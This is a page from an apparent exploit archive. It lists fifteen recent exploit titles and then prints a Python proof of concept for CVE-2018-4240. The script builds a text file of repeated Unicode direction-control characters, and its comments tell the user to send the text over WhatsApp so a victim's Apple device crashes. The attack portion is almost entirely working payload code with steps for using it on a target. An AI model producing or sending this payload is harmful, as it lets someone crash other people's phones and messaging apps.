
15 changes to exploits/shellcodes jiNa OCR Image to Text 1.0 - Denial of Service (PoC) PixGPS 1.1.8 - Denial of Service (PoC) RoboImport 1.2.0.72 - Denial of Service (PoC) PicaJet FX 2.6.5 - Denial of Service (PoC) iCash 7.6.5 - Denial of Service (PoC) PDF Explorer 1.5.66.2 - Denial of Service (PoC) Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC) Apple macOS 10.13.4 - Denial of Service (PoC) CirCarLife SCADA 4.3.0 - Credential Disclosure Rubedo CMS 3.4.0 - Directory Traversal SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS) SynaMan 4.0 build 1488 - SMTP Credential Disclosure IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection MyBB 1.8.17 - Cross-Site Scripting LG Smart IP Camera 1508190 - Backup File Download
26 lines
No EOL
1,017 B
Python
Executable file
26 lines
No EOL
1,017 B
Python
Executable file
# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)
|
|
# Date: 2019-09-10
|
|
# Exploit Author: Sriram (@Sri_Hxor)
|
|
# Vendor Homepage: https://support.apple.com/en-in/HT208848
|
|
# Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0
|
|
# CVE : CVE-2018-4240 (2018)
|
|
# POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf
|
|
|
|
# Crashing Phone via RLM character.
|
|
# Steps to Reproduce,
|
|
|
|
# Run the below python script as "python apple.py", it will create a file called "dos_apple.txt"
|
|
# Copy the text from the generated apple.txt
|
|
# Paste it in WhatsApp and send it, victim gotta click and it will start crashing
|
|
|
|
end = "‮ereh-hcuot-t'nod"
|
|
dos = "‎‏"
|
|
payload = dos*1000 + end
|
|
try:
|
|
f=open("dos_apple.txt","w")
|
|
print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos))
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "Can't create a file, check DIR permissions?" |